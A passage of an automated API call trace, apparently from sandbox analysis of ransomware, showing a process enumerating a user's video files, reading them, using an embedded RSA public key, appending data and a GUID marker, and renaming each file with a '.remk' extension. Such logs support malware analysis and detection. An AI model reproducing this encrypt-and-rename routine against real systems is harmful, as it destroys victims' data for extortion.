1 [0237.831] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0237.831] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0237.831] CloseHandle (hObject=0x640) returned 1 [0237.834] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c78d8 [0237.834] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8d0) returned 0x37bd408 [0237.834] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\xB0W_x\\dcR8Wn\\XoMJ508kaZydeC8l.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pcpks0u\\csfg h-wcbkcac\\xb0w_x\\dcr8wn\\xomj508kazydec8l.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\xB0W_x\\dcR8Wn\\XoMJ508kaZydeC8l.flv.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pcpks0u\\csfg h-wcbkcac\\xb0w_x\\dcr8wn\\xomj508kazydec8l.flv.remk")) returned 1 [0237.836] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb6518370, ftCreationTime.dwHighDateTime=0x1d5d7dc, ftLastAccessTime.dwLowDateTime=0x87de4760, ftLastAccessTime.dwHighDateTime=0x1d5e04e, ftLastWriteTime.dwLowDateTime=0x87de4760, ftLastWriteTime.dwHighDateTime=0x1d5e04e, nFileSizeHigh=0x0, nFileSizeLow=0x14c5c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XoMJ508kaZydeC8l.flv", cAlternateFileName="XOMJ50~1.FLV")) returned 0 [0237.836] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0237.836] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0237.836] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb0) returned 0x3185fa8 [0237.836] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0237.836] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb0) returned 0x3185cc8 [0237.836] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0237.836] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\xB0W_x\\TNlwUISWdF VQwLUr\\") returned="TNlwUISWdF VQwLUr\\" [0237.836] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a20 [0237.838] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e860 [0237.838] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\xB0W_x\\") returned="xB0W_x\\" [0237.838] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694fd0 [0237.838] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\") returned="CSFg h-wcbKcac\\" [0237.838] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0237.838] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\") returned="PCPKs0u\\" [0237.838] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5808 [0237.838] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0237.838] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37cf498 [0237.838] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0237.838] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0237.838] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0237.838] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0237.838] PathFindFileNameW (pszPath="") returned="" [0237.838] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb0) returned 0x3185cc8 [0237.838] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\xB0W_x\\TNlwUISWdF VQwLUr\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2e290100, ftCreationTime.dwHighDateTime=0x1d5e0d6, ftLastAccessTime.dwLowDateTime=0x3e4ffa10, ftLastAccessTime.dwHighDateTime=0x1d5d9e3, ftLastWriteTime.dwLowDateTime=0x3e4ffa10, ftLastWriteTime.dwHighDateTime=0x1d5d9e3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0237.840] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2e290100, ftCreationTime.dwHighDateTime=0x1d5e0d6, ftLastAccessTime.dwLowDateTime=0x3e4ffa10, ftLastAccessTime.dwHighDateTime=0x1d5d9e3, ftLastWriteTime.dwLowDateTime=0x3e4ffa10, ftLastWriteTime.dwHighDateTime=0x1d5d9e3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0237.841] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x384482d0, ftCreationTime.dwHighDateTime=0x1d5e276, ftLastAccessTime.dwLowDateTime=0x8bcdef30, ftLastAccessTime.dwHighDateTime=0x1d5db0b, ftLastWriteTime.dwLowDateTime=0x8bcdef30, ftLastWriteTime.dwHighDateTime=0x1d5db0b, nFileSizeHigh=0x0, nFileSizeLow=0x20f7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="35fwF Y81hH3FH.mkv", cAlternateFileName="35FWFY~1.MKV")) returned 1 [0237.841] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb0) returned 0x3185cc8 [0237.841] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x106) returned 0x31f6b30 [0237.841] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\xB0W_x\\TNlwUISWdF VQwLUr\\35fwF Y81hH3FH.mkv") returned=".mkv" [0237.841] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\xB0W_x\\TNlwUISWdF VQwLUr\\35fwF Y81hH3FH.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pcpks0u\\csfg h-wcbkcac\\xb0w_x\\tnlwuiswdf vqwlur\\35fwf y81hh3fh.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0237.841] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=8439) returned 1 [0237.841] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0237.844] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x20d1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.844] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0237.846] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0237.846] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x20f7, lpOverlapped=0x0) returned 1 [0237.847] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0237.847] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0237.847] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0237.847] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0237.847] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694fd0) returned 1 [0237.848] CryptCreateHash (in: hProv=0x694fd0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0237.848] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0237.849] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0237.849] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0237.849] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0237.849] GetLastError () returned 0x0 [0237.849] CryptDestroyHash (hHash=0x31de170) returned 1 [0237.849] CryptReleaseContext (hProv=0x694fd0, dwFlags=0x0) returned 1 [0237.849] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0237.849] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0237.849] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0237.849] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0237.849] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0237.849] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0237.849] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0237.849] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2100) returned 0x37c8278 [0237.849] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0237.849] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0237.849] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x31c0d08 [0237.850] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0237.850] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0237.850] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0237.850] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37cf498 [0237.850] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bca38 [0237.850] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37cf4e0 [0237.850] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bca50 [0237.850] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bca80 [0237.850] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bcae0 [0237.850] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bca98 [0237.850] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0237.850] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0237.850] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0237.850] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0237.850] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bca80 | out: hHeap=0x630000) returned 1 [0237.850] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bca98 | out: hHeap=0x630000) returned 1 [0237.850] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcae0 | out: hHeap=0x630000) returned 1 [0237.850] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0237.850] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0237.850] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bcae0 [0237.850] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0237.850] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bca98 [0237.851] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0f28 [0237.851] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x37bca80 [0237.851] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0237.851] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0237.851] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0237.851] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0237.851] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0237.851] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6c48 [0237.851] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0237.851] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0237.851] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0237.851] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bca98 | out: hHeap=0x630000) returned 1 [0237.851] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0237.851] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bca80 | out: hHeap=0x630000) returned 1 [0237.851] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0237.851] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0237.851] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcae0 | out: hHeap=0x630000) returned 1 [0237.851] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0237.851] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0237.851] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b88 | out: hHeap=0x630000) returned 1 [0237.851] GetCurrentThreadId () returned 0x314 [0237.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0237.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c6dd0 [0237.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0237.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694fd0 [0237.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0237.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0237.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0237.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0237.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0237.852] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0237.852] GetCurrentThreadId () returned 0x314 [0237.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0237.852] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0237.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x65dd10 [0237.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0237.852] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0237.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0237.852] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0237.852] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0237.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0237.852] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0237.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0237.853] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0237.853] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31b6580 [0237.853] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0237.853] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bcae0 [0237.853] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0237.853] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0237.853] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0237.853] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x20f7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.853] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0237.854] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0237.854] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0237.854] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0237.854] CloseHandle (hObject=0x640) returned 1 [0237.855] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\xB0W_x\\TNlwUISWdF VQwLUr\\35fwF Y81hH3FH.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pcpks0u\\csfg h-wcbkcac\\xb0w_x\\tnlwuiswdf vqwlur\\35fwf y81hh3fh.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\xB0W_x\\TNlwUISWdF VQwLUr\\35fwF Y81hH3FH.mkv.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pcpks0u\\csfg h-wcbkcac\\xb0w_x\\tnlwuiswdf vqwlur\\35fwf y81hh3fh.mkv.remk")) returned 1 [0237.856] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bd408 | out: hHeap=0x630000) returned 1 [0237.856] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0237.857] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0237.858] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0237.858] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2064c200, ftCreationTime.dwHighDateTime=0x1d5e556, ftLastAccessTime.dwLowDateTime=0xb74dfcf0, ftLastAccessTime.dwHighDateTime=0x1d5d7bd, ftLastWriteTime.dwLowDateTime=0xb74dfcf0, ftLastWriteTime.dwHighDateTime=0x1d5d7bd, nFileSizeHigh=0x0, nFileSizeLow=0xd65e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cnAJanV1kmNfWz8.swf", cAlternateFileName="CNAJAN~1.SWF")) returned 1 [0237.858] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\xB0W_x\\TNlwUISWdF VQwLUr\\cnAJanV1kmNfWz8.swf") returned=".swf" [0237.858] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\xB0W_x\\TNlwUISWdF VQwLUr\\cnAJanV1kmNfWz8.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pcpks0u\\csfg h-wcbkcac\\xb0w_x\\tnlwuiswdf vqwlur\\cnajanv1kmnfwz8.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0237.859] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=54878) returned 1 [0237.859] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0237.862] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xd638, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.862] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0237.864] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0xd65e, lpOverlapped=0x0) returned 1 [0237.865] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0237.865] lstrlenA (lpString="-----BEGIN PUBLIC 